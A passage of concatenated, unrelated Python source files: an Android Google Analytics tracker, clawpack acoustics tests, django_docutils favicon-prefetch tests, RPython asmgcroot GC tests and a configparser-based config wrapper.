"86192",
"86196",
"86197",
"86235",
"86237",
"86239",
"86245",
"86261",
"86277",
"86284",
"86291",
"86340",
"86343",
"86364",
"86386",
"86389",
"86397",
"86431",
"86454",
"86457",
"86475",
"86489",
"86510",
"86517",
"86534",
"86549",
"86552",
"86557",
"86575",
"86594",
"86607",
"86614",
"86622",
"86653",
"86668",
"86693",
"86696",
"86697",
"86699",
"86704",
"86708",
"86719",
"86749",
"86787",
"86788",
"86796",
"86798",
"86801",
"86820",
"86830",
"86853",
"86867",
"86871",
"86888",
"86893",
"86894",
"86896",
"86909",
"86913",
"86933",
"86938",
"86944",
"86955",
"86964",
"86971",
"86992",
"86997",
"87018",
"87021",
"87023",
"87039",
"87042",
"87057",
"87066",
"87098",
"87113",
"87149",
"87172",
"87175",
"87219",
"87237",
"87272",
"87280",
"87292",
"87317",
"87319",
"87334",
"87354",
"87377",
"87395",
"87397",
"87411",
"87441",
"87529",
"87534",
"87537",
"87538",
"87564",
"87570",
"87595",
"87609",
"87644",
"87646",
"87658",
"87671",
"87682",
"87683",
"87687",
"87702",
"87713",
"87721",
"87743",
"87745",
"87746",
"87748",
"87750",
"87752",
"87783",
"87820",
"87838",
"87841",
"87845",
"87854",
"87880",
"87896",
"87912",
"87934",
"87936",
"87940",
"87941",
"87991",
"87995",
"87999",
"88001",
"88003",
"88014",
"88018",
"88041",
"88048",
"88054",
"88059",
"88075",
"88087",
"88095",
"88109",
"88119",
"88124",
"88137",
"88140",
"88163",
"88164",
"88167",
"88209",
"88221",
"88222",
"88223",
"88239",
"88252",
"88274",
"88280",
"88283",
"88336",
"88337",
"88339",
"88342",
"88354",
"88370",
"88371",
"88375",
"88389",
"88430",
"88434",
"88466",
"88482",
"88522",
"88525",
"88529",
"88556",
"88567",
"88578",
"88579",
"88582",
"88589",
"88593",
"88595",
"88605",
"88617",
"88637",
"88674",
"88721",
"88722",
"88754",
"88767",
"88773",
"88784",
"88785",
"88811",
"88828",
"88862",
"88877",
"88883",
"88903",
"88909",
"88924",
"88930",
"88948",
"88971",
"88988",
"88994",
"89003",
"89089",
"89094",
"89101",
"89120",
"89145",
"89188",
"89193",
"89230",
"89231",
"89236",
"89237",
"89252",
"89275",
"89303",
"89305",
"89306",
"89309",
"89310",
"89343",
"89351",
"89352",
"89387",
"89391",
"89398",
"89431",
"89452",
"89454",
"89501",
"89515",
"89532",
"89534",
"89550",
"89583",
"89584",
"89614",
"89634",
"89642",
"89651",
"89672",
"89681",
"89726",
"89737",
"89740",
"89766",
"89785",
"89793",
"89818",
"89829",
"89840",
"89843",
"89858",
"89865",
"89920",
"89938",
"89959",
"89971",
"89981",
"90001",
"90008",
"90026",
"90049",
"90056",
"90059",
"90069",
"90116",
"90125",
"90128",
"90141",
"90150",
"90162",
"90163",
"90164",
"90169",
"90191",
"90193",
"90194",
"90216",
"90236",
"90238",
"90262",
"90268",
"90275",
"90278",
"90296",
"90297",
"90302",
"90307",
"90309",
"90311",
"90314",
"90319",
"90320",
"90323",
"90325",
"90336",
"90344",
"90369",
"90381",
"90383",
"90399",
"90408",
"90411",
"90414",
"90418",
"90419",
"90428",
"90444",
"90451",
"90468",
"90485",
"90492",
"90499",
"90519",
"90522",
"90525",
"90526",
"90534",
"90540",
"90573",
"90584",
"90586",
"90587",
"90589",
"90618",
"90631",
"90634",
"90635",
"90681",
"90725",
"90728",
"90732",
"90744",
"90757",
"90765",
"90766",
"90817",
"90852",
"90854",
"90875",
"90894",
"90899",
"90913",
"90918",
"90919",
"90965",
"90982",
"90986",
"91075",
"91083",
"91087",
"91104",
"91135",
"91143",
"91147",
"91160",
"91176",
"91178",
"91201",
"91204",
"91206",
"91209",
"91216",
"91218",
"91219",
"91229",
"91233",
"91254",
"91278",
"91286",
"91289",
"91294",
"91320",
"91364",
"91379",
"91387",
"91398",
"91403",
"91409",
"91421",
"91423",
"91439",
"91453",
"91495",
"91521",
"91523",
"91525",
"91529",
"91545",
"91564",
"91590",
"91620",
"91632",
"91639",
"91649",
"91654",
"91669",
"91675",
"91685",
"91686",
"91692",
"91711",
"91715",
"91721",
"91732",
"91749",
"91757",
"91764",
"91767",
"91782",
"91818",
"91821",
"91824",
"91830",
"91838",
"91844",
"91851",
"91852",
"91854",
"91869",
"91877",
"91904",
"91933",
"91934",
"91944",
"91952",
"92005",
"92022",
"92024",
"92033",
"92046",
"92105",
"92106",
"92123",
"92124",
"92139",
"92150",
"92160",
"92185",
"92205",
"92219",
"92244",
"92255",
"92258",
"92276",
"92284",
"92291",
"92293",
"92297",
"92324",
"92366",
"92444",
"92455",
"92459",
"92477",
"92503",
"92532",
"92562",
"92565",
"92621",
"92629",
"92648",
"92668",
"92686",
"92704",
"92724",
"92738",
"92807",
"92808",
"92812",
"92814",
"92819",
"92834",
"92884",
"92898",
"92917",
"92924",
"92935",
"93003",
"93027",
"93075",
"93109",
"93175",
"93235",
"93289",
"93292",
"93298",
"93301",
"93318",
"93342",
"93360",
"93368",
"93372",
"93394",
"93405",
"93425",
"93445",
"93447",
"93451",
"93481",
"93511",
"93521",
"93524",
"93592",
"93595",
"93604",
"93617",
"93622",
"93628",
"93629",
"93683",
"93788",
"93790",
"93804",
"93824",
"93830",
"93868",
"93879",
"93883",
"93951",
"93957",
"93959",
"93971",
"94004",
"94027",
"94029",
"94039",
"94062",
"94074",
"94088",
"94090",
"94092",
"94098",
"94104",
"94106",
"94107",
"94120",
"94136",
"94145",
"94153",
"94167",
"94174",
"94188",
"94190",
"94212",
"94240",
"94244",
"94253",
"94254",
"94267",
"94273",
"94286",
"94289",
"94312",
"94324",
"94338",
"94355",
"94369",
"94372",
"94408",
"94422",
"94435",
"94462",
"94464",
"94466",
"94489",
"94525",
"94536",
"94546",
"94554",
"94569",
"94593",
"94597",
"94602",
"94614",
"94615",
"94642",
"94683",
"94686",
"94689",
"94694",
"94744",
"94748",
"94749",
"94752",
"94760",
"94769",
"94843",
"94854",
"94919",
"94921",
"94975",
"94980",
"94993",
"95010",
"95018",
"95038",
"95079",
"95114",
"95115",
"95119",
"95124",
"95167",
"95236",
"95241",
"95258",
"95271",
"95272",
"95281",
"95290",
"95294",
"95325",
"95354",
"95386",
"95391",
"95392",
"95402",
"95413",
"95420",
"95423",
"95460",
"95464",
"95465",
"95491",
"95495",
"95497",
"95501",
"95508",
"95521",
"95566",
"95576",
"95591",
"95597",
"95605",
"95621",
"95623",
"95625",
"95669",
"95681",
"95709",
"95717",
"95743",
"95752",
"95781",
"95799",
"95802",
"95804",
"95817",
"95819",
"95858",
"95867",
"95888",
"95903",
"95933",
"95945",
"95965",
"95975",
"95980",
"95985",
"95990",
"96000",
"96045",
"96060",
"96074",
"96075",
"96088",
"96098",
"96115",
"96134",
"96144",
"96192",
"96196",
"96197",
"96237",
"96239",
"96240",
"96245",
"96277",
"96284",
"96291",
"96294",
"96340",
"96343",
"96364",
"96386",
"96389",
"96431",
"96444",
"96457",
"96489",
"96497",
"96517",
"96534",
"96539",
"96549",
"96557",
"96575",
"96594",
"96607",
"96614",
"96622",
"96653",
"96668",
"96693",
"96696",
"96697",
"96699",
"96719",
"96723",
"96749",
"96787",
"96788",
"96798",
"96801",
"96820",
"96830",
"96853",
"96867",
"96871",
"96893",
"96894",
"96896",
"96909",
"96933",
"96938",
"96955",
"96964",
"96971",
"96984",
"96992",
"96997",
"97021",
"97023",
"97039",
"97042",
"97057",
"97066",
"97098",
"97113",
"97137",
"97172",
"97207",
"97219",
"97253",
"97272",
"97292",
"97317",
"97319",
"97322",
"97333",
"97334",
"97354",
"97395",
"97411",
"97441",
)
# Ordered lifecycle states for a tracked package, from initial manifest
# through final disposition.  NOTE(review): presumably sampled when
# generating fixture/tracking data alongside LOREM/GARBAGE below -- confirm
# against the callers of this module.
PACKAGE_STATUSES = (
    'Manifest',
    'In-Transit',
    'Exception',
    'Out for Delivery',
    'Ready for Pickup',
    'Delivered',
    'Void',
)
# Load the text corpora once at import time so later lookups are cheap.
# NOTE(review): paths are relative, so this assumes the process working
# directory contains the ``spring`` directory -- confirm how the module is
# launched.  No explicit encoding is given, so the platform default is used;
# consider pinning encoding='utf-8' if the project is Python-3 only.
with open('spring/dictionary.txt') as fh:
    LOREM = fh.read()
with open('spring/garbage.txt') as fh:
    GARBAGE = fh.read()
|
1690424
|
from tracking.abstract import AbstractTracker
from jnius import autoclass, JavaException
# Resolve the Java classes needed for Google Analytics once, at import time,
# via the jnius bridge.  ``HitBuilders$ScreenViewBuilder`` and
# ``HitBuilders$EventBuilder`` are inner classes (hence the ``$``) used to
# construct analytics hits.
ScreenViewBuilder = autoclass('com.google.android.gms.analytics.HitBuilders$ScreenViewBuilder')
EventBuilder = autoclass('com.google.android.gms.analytics.HitBuilders$EventBuilder')
GoogleAnalytics = autoclass('com.google.android.gms.analytics.GoogleAnalytics')
# Kivy's Android activity, used to obtain the Application/Context objects.
PythonActivity = autoclass('org.kivy.android.PythonActivity')
# java.lang.String wrapper; jnius calls that take Java strings need it.
AndroidString = autoclass('java.lang.String')
class GoogleTracker(AbstractTracker):
    """Analytics backend that forwards screens/events to Google Analytics
    through the jnius Java bridge (Android only).
    """

    def __init__(self):
        # Native tracker is created lazily; stays None until first success.
        self.tracker = None

    def _get_tracker(self):
        """Return the cached native tracker, creating it on first use.

        Returns None when the Java side raises (tracking is then silently
        skipped by the callers).
        """
        if self.tracker:
            return self.tracker
        import settings
        try:
            ga = GoogleAnalytics.getInstance(PythonActivity.getApplication())
            if settings.DEVELOPMENT_VERSION:
                # Dry-run: hits are processed/validated but never sent.
                ga.setDryRun(True)
            new_tracker = ga.newTracker(
                AndroidString(settings.GOOGLE_ANALYTICS_TRACKING_ID))
            new_tracker.setSessionTimeout(300)
            new_tracker.enableAdvertisingIdCollection(True)
        except JavaException:
            return None
        self.tracker = new_tracker
        return new_tracker

    def send_screen(self, screen):
        """Record a screen view for ``screen`` (uses ``screen.name``)."""
        super(GoogleTracker, self).send_screen(screen)
        tracker = self._get_tracker()
        if tracker:
            tracker.setScreenName(AndroidString(screen.name))
            tracker.send(ScreenViewBuilder().build())

    def clear_screen(self):
        """Reset the tracker's current screen name."""
        super(GoogleTracker, self).clear_screen()
        tracker = self._get_tracker()
        if tracker:
            tracker.setScreenName(None)

    def send_event(self, category, action, label=None, value=None):
        """Record an analytics event; label/value are attached only if truthy."""
        super(GoogleTracker, self).send_event(category, action, label)
        tracker = self._get_tracker()
        if not tracker:
            return
        builder = EventBuilder().setCategory(category).setAction(action)
        if label:
            builder.setLabel(label)
        if value:
            builder.setValue(int(value))
        tracker.send(builder.build())

    def send_to_server(self):
        """Flush locally queued hits to the Google Analytics servers."""
        super(GoogleTracker, self).send_to_server()
        context = PythonActivity.getBaseContext()
        GoogleAnalytics.getInstance(context).dispatchLocalHits()
|
1690431
|
from __future__ import absolute_import
def test_1d_acoustics():
    """test_1d_acoustics

    Checks the 1D acoustics example against known reference errors for the
    classic, sharpclaw, and high-order WENO solver configurations.
    """
    from . import acoustics_1d

    def make_verifier(expected):
        """Bind *expected* into a verifier usable by gen_variants."""
        def acoustics_verify(claw):
            import numpy as np
            from clawpack.pyclaw.util import check_diff
            first = claw.frames[0].state.get_q_global()
            last = claw.frames[claw.num_output_times].state.get_q_global()
            # get_q_global() returns the full array on process 0 only;
            # other ranks get None and skip the check.
            if first is None or last is None:
                return
            cell_width = claw.solution.domain.grid.delta[0]
            measured = cell_width * np.sum(
                np.abs(last.reshape([-1]) - first.reshape([-1])))
            return check_diff(expected, measured, abstol=1e-4)
        return acoustics_verify

    from clawpack.pyclaw.util import gen_variants

    classic_tests = gen_variants(
        acoustics_1d.setup, make_verifier(0.001049),
        kernel_languages=('Python', 'Fortran'),
        solver_type='classic', disable_output=True)

    time_step_test = gen_variants(
        acoustics_1d.setup, make_verifier(0.002020),
        kernel_languages=('Python',),
        solver_type='classic', disable_output=True,
        output_style=3)

    ptwise_tests = gen_variants(
        acoustics_1d.setup, make_verifier(0.001049),
        kernel_languages=('Fortran',), ptwise=True,
        solver_type='classic', disable_output=True)

    sharp_tests_rk = gen_variants(
        acoustics_1d.setup, make_verifier(0.000299),
        kernel_languages=('Python', 'Fortran'),
        solver_type='sharpclaw',
        time_integrator='SSP104', disable_output=True)

    sharp_tests_lmm = gen_variants(
        acoustics_1d.setup, make_verifier(0.000231),
        kernel_languages=('Python', 'Fortran'),
        solver_type='sharpclaw',
        time_integrator='SSPLMMk3',
        disable_output=True)

    weno_tests = gen_variants(
        acoustics_1d.setup, make_verifier(0.000153),
        kernel_languages=('Fortran',),
        solver_type='sharpclaw', time_integrator='SSP104',
        weno_order=17, disable_output=True)

    for group in (classic_tests, time_step_test, ptwise_tests,
                  sharp_tests_rk, sharp_tests_lmm, weno_tests):
        for variant in group:
            yield variant
if __name__ == "__main__":
    # NOTE(review): nose is unmaintained; kept because the project's test
    # harness still relies on nose-style generator tests.
    import nose
    nose.main()
|
1690485
|
import pytest
import responses
from django.core.files.uploadedfile import SimpleUploadedFile
from docutils.nodes import document
from inmemorystorage.storage import InMemoryFile
from django_docutils.favicon.prefetch import (
is_favicon_stored,
prefetch_favicon,
yield_page_doctrees,
yield_references,
)
from django_docutils.lib.publisher import publish_doctree
TEST_RST_DOCUMENT = """
Developing
==========
- Make a hobby website in django or flask.
Services like `Heroku`_ are free to try, and simple to deploy Django
websites to.
- For free editors, check out good old `vim`_, `Visual Studio Code`_,
`Atom`_, or `PyCharm`_
.. _Visual Studio Code: https://code.visualstudio.com/
.. _Atom: https://atom.io/
.. _vim: http://vim.org
.. _PyCharm: https://www.jetbrains.com/pycharm/
"""
def test_yield_references():
    """Every hyperlink target in the fixture document is yielded."""
    doctree = publish_doctree(TEST_RST_DOCUMENT)
    expected = {
        'https://code.visualstudio.com/',
        'https://atom.io/',
        'http://vim.org',
        'https://www.jetbrains.com/pycharm/',
    }
    assert set(yield_references(doctree)) == expected
def test_yield_references_patterns():
    """``url_pattern`` restricts which references are yielded."""
    doctree = publish_doctree(TEST_RST_DOCUMENT)
    matches = set(yield_references(doctree, url_pattern='atom'))
    assert matches == {'https://atom.io/'}
@pytest.mark.django_db(transaction=True)
def test_yield_page_doctrees(RSTPostPage):
    """Each stored page body is yielded as a parsed docutils document."""
    RSTPostPage.objects.create(subtitle='lol', body=TEST_RST_DOCUMENT)
    assert RSTPostPage.objects.filter(subtitle='lol').count()
    page_doctrees = list(yield_page_doctrees(RSTPostPage))
    assert len(page_doctrees)
    for page in page_doctrees:
        # Every yielded item must be a docutils document node.
        assert isinstance(page, document)
@pytest.mark.django_db(transaction=True)
@responses.activate
def test_prefetch_favicon_working():
    """Happy path: page advertises a favicon URL, its bytes get stored."""
    url = 'http://vim.org'
    favicon_url = f'{url}/images/favicon.ico'
    favicon_content = b'lol'
    # First request: HTML page whose <link> points at the favicon.
    responses.add(
        responses.GET,
        url,
        body='<link rel="shortcut icon" href="{favicon_url}" />'.format(
            favicon_url=favicon_url
        ),
        status=200,
        content_type='text/html',
    )
    # Second request: the favicon bytes themselves.
    responses.add(
        responses.GET,
        favicon_url,
        body=favicon_content,
        status=200,
        content_type='image/ico',
    )
    favicon, created = prefetch_favicon(url)
    # Stored file content matches what the mocked server returned.
    assert favicon.favicon.read() == favicon_content
@pytest.mark.django_db(transaction=True)
@responses.activate
def test_prefetch_favicon_file_missing(monkeypatch):
    """Re-fetch behaviour when the favicon row exists but the file is gone.

    Case where the favicon is in the ORM, but the file is not in storage:
    a second prefetch is a no-op until ``is_favicon_stored`` reports the
    file missing, at which point ``prefetch_favicon`` runs again but the
    existing ORM row means ``created`` is False.
    """
    url = 'http://vim.org'
    favicon_url = f'{url}/images/favicon.ico'
    favicon_content = b'lol'
    # Mock the HTML page advertising the favicon and the favicon itself.
    responses.add(
        responses.GET,
        url,
        body='<link rel="shortcut icon" href="{favicon_url}" />'.format(
            favicon_url=favicon_url
        ),
        status=200,
        content_type='text/html',
    )
    responses.add(
        responses.GET,
        favicon_url,
        body=favicon_content,
        status=200,
        content_type='image/ico',
    )
    favicon, created = prefetch_favicon(url)
    import django_docutils.favicon.prefetch
    # Already stored: prefetch returns a falsy value instead of re-fetching.
    assert not prefetch_favicon(url)
    # Pretend the file vanished from storage; prefetch fetches again, but
    # the ORM row already exists so nothing new is created.
    monkeypatch.setattr(
        django_docutils.favicon.prefetch, 'is_favicon_stored', lambda fqdn: False
    )
    favicon, created = prefetch_favicon(url)
    assert not created
@pytest.mark.django_db(transaction=True)
@responses.activate
def test_is_favicon_stored_file_missing(monkeypatch, Favicon):
    """is_favicon_stored() is False when the row exists but the file is gone."""
    # case where the favicon is in ORM, but file not in storage
    url = 'http://vim.org'
    fqdn = 'vim.org'
    def mock_open(path, mode='r'):
        # Simulates the storage backend missing the file on disk.
        raise FileNotFoundError
    favicon = Favicon.objects.create(
        domain=fqdn,
        favicon=SimpleUploadedFile(
            name=f'{fqdn}.ico', content=b'lol', content_type='image/ico',
        ),
    )
    assert not prefetch_favicon(url), 'File should not redownload'
    monkeypatch.setattr(InMemoryFile, 'open', mock_open)
    with pytest.raises(FileNotFoundError):  # Assure monkeypatch
        favicon.favicon.file
    assert not is_favicon_stored(
        favicon.domain
    ), 'favicon missing from storage should return False'
@pytest.mark.django_db(transaction=True)
@responses.activate
def test_is_favicon_stored_favicon_not_in_db():
    """is_favicon_stored() is False for a domain with no Favicon row."""
    # (dropped the unused ``monkeypatch`` fixture parameter)
    assert not is_favicon_stored(
        'nonexistant_fqdn.com'
    ), 'favicon missing from database should return False'
|
1690505
|
import py
import sys, os, gc
from rpython.translator.c.test import test_newgc
from rpython.translator.translator import TranslationContext
from rpython.translator.c.genc import CStandaloneBuilder
from rpython.annotator.listdef import s_list_of_strings
from rpython.conftest import option
from rpython.translator.tool.cbuild import ExternalCompilationInfo
from rpython.translator.platform import platform as compiler
from rpython.rlib.rarithmetic import is_emulated_long
from rpython.rtyper.lltypesystem import lltype, rffi
from rpython.rlib.entrypoint import entrypoint_highlevel, secondary_entrypoints
from rpython.rtyper.lltypesystem.lloperation import llop
# Host toolchain detection used by the skip conditions below.
_MSVC = compiler.name == "msvc"
_MINGW = compiler.name == "mingw32"
_WIN32 = _MSVC or _MINGW
_WIN64 = _WIN32 and is_emulated_long
# XXX get rid of 'is_emulated_long' and have a real config here.
class AbstractTestAsmGCRoot:
    """Base for asmgcroot GC-root-finder tests (Python 2 / RPython toolchain).

    Translates a test function to a standalone C executable with the
    "asmgcc" root finder, then runs it in a subprocess and parses its
    'Result: ...' output line.
    """
    # the asmgcroot gc transformer doesn't generate gc_reload_possibly_moved
    # instructions:
    should_be_moving = False
    @classmethod
    def make_config(cls):
        """Build a translation config with gcrootfinder=asmgcc."""
        if _MSVC:
            py.test.skip("all asmgcroot tests disabled for MSVC")
        from rpython.config.translationoption import get_combined_translation_config
        config = get_combined_translation_config(translating=True)
        config.translation.gc = cls.gcpolicy
        config.translation.gcrootfinder = "asmgcc"
        config.translation.taggedpointers = getattr(cls, "taggedpointers", False)
        return config
    @classmethod
    def _makefunc_str_int(cls, func):
        """Translate func(str, int) to an executable; return a run() helper."""
        def main(argv):
            # Entry point of the translated binary: argv[1] is a string,
            # argv[2] an int; the result is printed as 'Result: ...'.
            arg0 = argv[1]
            arg1 = int(argv[2])
            try:
                res = func(arg0, arg1)
            except MemoryError:
                print 'Result: MemoryError'
            else:
                print 'Result: "%s"' % (res,)
            return 0
        config = cls.make_config()
        t = TranslationContext(config=config)
        a = t.buildannotator()
        # Annotate any extra C entry points declared by the test class.
        sec_ep = getattr(cls, 'secondary_entrypoints', [])
        for f, inputtypes in sec_ep:
            a.build_types(f, inputtypes, False)
        a.build_types(main, [s_list_of_strings])
        t.buildrtyper().specialize()
        t.checkgraphs()
        cbuilder = CStandaloneBuilder(t, main, config=config,
                                      secondary_entrypoints=sec_ep)
        c_source_filename = cbuilder.generate_source(
            defines = cbuilder.DEBUG_DEFINES)
        cls._patch_makefile(cbuilder.targetdir)
        if option.view:
            t.view()
        exe_name = cbuilder.compile()
        def run(arg0, arg1, runner=None):
            """Run the compiled binary and decode its 'Result:' line."""
            if runner is not None:
                py.test.skip("unsupported test: runner=%r" % (runner,))
            lines = []
            print >> sys.stderr, 'RUN: starting', exe_name, arg0, arg1
            if sys.platform == 'win32':
                redirect = ' 2> NUL'
            else:
                redirect = ''
            if config.translation.shared and os.name == 'posix':
                # Shared build: the dynamic loader must find the library.
                library_path = exe_name.dirpath()
                if sys.platform == 'darwin':
                    env = 'DYLD_LIBRARY_PATH="%s" ' % library_path
                else:
                    env = 'LD_LIBRARY_PATH="%s" ' % library_path
            else:
                env = ''
            cwd = os.getcwd()
            try:
                os.chdir(str(exe_name.dirpath()))
                g = os.popen(
                    '%s"%s" %s %d%s' % (env, exe_name, arg0, arg1, redirect), 'r')
            finally:
                os.chdir(cwd)
            for line in g:
                print >> sys.stderr, 'RUN:', line.rstrip()
                lines.append(line)
            g.close()
            if not lines:
                py.test.fail("no output from subprocess")
            if not lines[-1].startswith('Result:'):
                py.test.fail("unexpected output from subprocess")
            result = lines[-1][len('Result:'):].strip()
            if result == 'MemoryError':
                raise MemoryError("subprocess got an RPython MemoryError")
            if result.startswith('"') and result.endswith('"'):
                # Quoted result: a string value; otherwise an integer.
                return result[1:-1]
            else:
                return int(result)
        return run
    @classmethod
    def _patch_makefile(cls, targetdir):
        # for testing, patch the Makefile to add the -r option to
        # trackgcroot.py.
        makefile = targetdir.join('Makefile')
        f = makefile.open()
        lines = f.readlines()
        f.close()
        found = False
        for i in range(len(lines)):
            if 'trackgcroot.py' in lines[i]:
                lines[i] = lines[i].replace('trackgcroot.py',
                                            'trackgcroot.py -r')
                found = True
        assert found
        f = makefile.open('w')
        f.writelines(lines)
        f.close()
    if sys.platform == 'win32':
        # libffi-based callbacks are unavailable under mingw32 on Windows.
        def test_callback_with_collect(self):
            py.test.skip("No libffi yet with mingw32")
        def define_callback_with_collect(cls):
            return lambda: 0
class TestAsmGCRootWithSemiSpaceGC(AbstractTestAsmGCRoot,
                                   test_newgc.TestSemiSpaceGC):
    """asmgcroot tests run with the semispace GC policy."""
    # for the individual tests see
    # ====> ../../test/test_newgc.py
    secondary_entrypoints = []
    def define_large_function(cls):
        """Build a function with ~1000 statements to stress stack maps."""
        class A(object):
            def __init__(self):
                self.x = 0
        d = dict(A=A)
        # Generate g() with 1000 increments via exec (Python 2 syntax).
        exec ("def g(a):\n" +
              "    a.x += 1\n" * 1000 +
              "    return A()\n"
              ) in d
        g = d['g']
        def f():
            a = A()
            g(a)
            return a.x
        return f
    def test_large_function(self):
        res = self.run('large_function')
        assert res == 1000
    def define_callback_simple(cls):
        """C code calls back into RPython; the callback triggers a GC."""
        c_source = py.code.Source("""
            int mystuff(int(*cb)(int, int))
            {
                return cb(40, 2) + cb(3, 4);
            }
        """)
        eci = ExternalCompilationInfo(separate_module_sources=[c_source])
        S = lltype.GcStruct('S', ('x', lltype.Signed))
        CALLBACK = lltype.FuncType([lltype.Signed, lltype.Signed],
                                   lltype.Signed)
        z = rffi.llexternal('mystuff', [lltype.Ptr(CALLBACK)], lltype.Signed,
                            compilation_info=eci)
        def mycallback(a, b):
            # gc.collect() inside the callback checks that roots held
            # across the C boundary survive a collection.
            gc.collect()
            return a + b
        def f():
            p = lltype.malloc(S)
            p.x = 100
            result = z(mycallback)
            return result * p.x
        return f
    def test_callback_simple(self):
        res = self.run('callback_simple')
        # (40+2) + (3+4) = 49, times p.x == 100
        assert res == 4900
    def define_secondary_entrypoint_callback(cls):
        """Same as callback_simple but through a named C entry point."""
        # XXX this is baaaad, cleanup global state
        try:
            del secondary_entrypoints["x42"]
        except KeyError:
            pass
        @entrypoint_highlevel("x42", [lltype.Signed, lltype.Signed],
                              c_name='callback')
        def mycallback(a, b):
            gc.collect()
            return a + b
        c_source = py.code.Source("""
            int mystuff2()
            {
                return callback(40, 2) + callback(3, 4);
            }
        """)
        eci = ExternalCompilationInfo(separate_module_sources=[c_source])
        z = rffi.llexternal('mystuff2', [], lltype.Signed,
                            compilation_info=eci)
        S = lltype.GcStruct('S', ('x', lltype.Signed))
        cls.secondary_entrypoints = secondary_entrypoints["x42"]
        def f():
            p = lltype.malloc(S)
            p.x = 100
            result = z()
            return result * p.x
        return f
    def test_secondary_entrypoint_callback(self):
        res = self.run('secondary_entrypoint_callback')
        assert res == 4900
class TestAsmGCRootWithSemiSpaceGC_Mingw32(TestAsmGCRootWithSemiSpaceGC):
    """Same suite, compiled with mingw32 (requires MSYS on Windows)."""
    # for the individual tests see
    # ====> ../../test/test_newgc.py
    @classmethod
    def setup_class(cls):
        if sys.platform != 'win32':
            py.test.skip("mingw32 specific test")
        # Both gcc (mingw flavour) and GNU make must be on PATH.
        if not ('mingw' in os.popen('gcc --version').read() and
                'GNU' in os.popen('make --version').read()):
            py.test.skip("mingw32 and MSYS are required for this test")
        test_newgc.TestSemiSpaceGC.setup_class.im_func(cls)
    @classmethod
    def make_config(cls):
        config = TestAsmGCRootWithSemiSpaceGC.make_config()
        config.translation.cc = 'mingw32'
        return config
    def test_callback_with_collect(self):
        py.test.skip("No libffi yet with mingw32")
    def define_callback_with_collect(cls):
        return lambda: 0
#class TestAsmGCRootWithSemiSpaceGC_Shared(TestAsmGCRootWithSemiSpaceGC):
# @classmethod
# def make_config(cls):
# config = TestAsmGCRootWithSemiSpaceGC.make_config()
# config.translation.shared = True
# return config
class TestAsmGCRootWithHybridTagged(AbstractTestAsmGCRoot,
                                    test_newgc.TestHybridTaggedPointers):
    # Inherits the full suite; only the GC policy mixin differs.
    pass
class TestAsmGCRootWithIncrementalMinimark(AbstractTestAsmGCRoot,
                                           test_newgc.TestIncrementalMiniMarkGC):
    # Inherits the full suite; only the GC policy mixin differs.
    pass
|
1690546
|
import os
import json
import configparser
from ssr.utility.logging_extension import logger
# Module-level singleton accessed via SSRConfig.get_instance()/set_instance().
_config = None
class SSRConfig:
    """Typed wrapper around a configparser-backed config file.

    Values are stored as strings; get_option_value() converts them on
    read, with JSON-decoding for list-typed options and inline '#'
    comment stripping for scalars.
    Note: failure modes use ``assert False`` (AssertionError), which is
    part of the observable contract for existing callers.
    """
    default_section = "DEFAULT"
    comment_symbol = "#"
    @staticmethod
    def get_instance():
        # Requires set_instance() to have been called first.
        assert _config is not None
        return _config
    @staticmethod
    def set_instance(config):
        global _config
        _config = config
    def __init__(self, config_fp, working_file_suffix=None):
        """Load (or create) the config file at ``config_fp``.

        ``working_file_suffix``: if given, write_state_to_disc() writes to
        ``config_fp + suffix`` instead of overwriting the original file.
        """
        self.config_fp = config_fp
        self.config = configparser.RawConfigParser()
        if not os.path.isfile(self.config_fp):
            abs_path = os.path.abspath(os.path.dirname(self.config_fp))
            if not os.path.isdir(abs_path):
                logger.vinfo("abs_path", abs_path)
                assert False  # config folder missing
            # Create an empty config file so later writes succeed.
            open(self.config_fp, "a").close()
        else:
            self.config.read(self.config_fp)
        if working_file_suffix is not None:
            self.path_to_working_copy = self.config_fp + working_file_suffix
        else:
            self.path_to_working_copy = self.config_fp
    def add_option_value_pairs(self, pair_list, section=None):
        """
        :param pair_list: iterable of ('option', 'value') tuples
        :param section: target section; DEFAULT when None
        :return:
        """
        if section is None:
            section = SSRConfig.default_section
        elif not self.config.has_section(section):
            self.config.add_section(section)
        for pair in pair_list:
            option, value = pair
            self.config.set(section, option, value)
    @staticmethod
    def detect_missing_commas(list_str):
        # Repairs JSON-ish lists where a comma between quoted items on
        # adjacent lines was forgotten: '"\n"' -> '",\n"'.
        repaired_string = list_str.replace('"\n"', '",\n"')
        return repaired_string
    @staticmethod
    def remove_appended_commas(list_str):
        # Removes a trailing comma before the closing bracket, which
        # json.loads would reject.
        repaired_string = list_str.replace('",\n]', '"\n]')
        return repaired_string
    def get_option_value(self, option, target_type, section=None):
        """
        :param section: section name; DEFAULT when None
        :param option: option name
        :param target_type: Python type to convert to (list uses JSON)
        :return: the converted option value
        """
        if section is None:
            section = SSRConfig.default_section
        try:
            if target_type == list:
                # Lists are stored as JSON; repair common hand-edit slips
                # before decoding.
                option_str = self.config.get(section, option)
                option_str = SSRConfig.detect_missing_commas(option_str)
                option_str = SSRConfig.remove_appended_commas(option_str)
                result = json.loads(option_str)
            else:
                option_str = self.config.get(section, option)
                # Strip inline '#' comments before conversion.
                option_str = option_str.split("#")[0].rstrip()
                if (
                    target_type == bool
                ):  # Allow True/False bool values in addition to 1/0
                    result = (
                        option_str == "True"
                        or option_str == "T"
                        or option_str == "1"
                    )
                else:
                    result = target_type(option_str)
        except configparser.NoOptionError as NoOptErr:
            logger.info("ERROR: " + str(NoOptErr))
            logger.info("CONFIG FILE: " + self.config_fp)
            assert False  # Option Missing
        except:
            # Log the offending raw string, then re-raise unchanged.
            logger.info("option_str: " + str(option_str))
            raise
        return result
    def get_option_value_or_default_value(
        self, option, target_type, default_value, section=None
    ):
        """Like get_option_value(), but fall back to ``default_value``."""
        if section is None:
            section = SSRConfig.default_section
        if self.config.has_option(section, option):
            result = self.get_option_value(
                option, target_type, section=section
            )
        else:
            result = default_value
        assert type(result) == target_type
        return result
    def get_option_value_or_None(self, option, target_type, section=None):
        """Like get_option_value(), but return None when the option is absent."""
        if section is None:
            section = SSRConfig.default_section
        result = None
        if self.config.has_option(section, option):
            result = self.get_option_value(
                option, target_type, section=section
            )
        return result
    def log_option_value_pairs(self):
        """Log every stored section proxy (one line per section)."""
        for val in self.config.values():
            logger.info(val)
    def write_state_to_disc(self):
        """Persist the current config to the working-copy path."""
        with open(self.path_to_working_copy, "w") as configfile:
            self.config.write(configfile)
if __name__ == "__main__":
    # Demo/manual test: build a config, write it out, and read typed values back.
    logger.info("Main called")
    config = SSRConfig(config_fp="example.cfg")
    section_option_value_pairs = [
        ("option1", "125"),
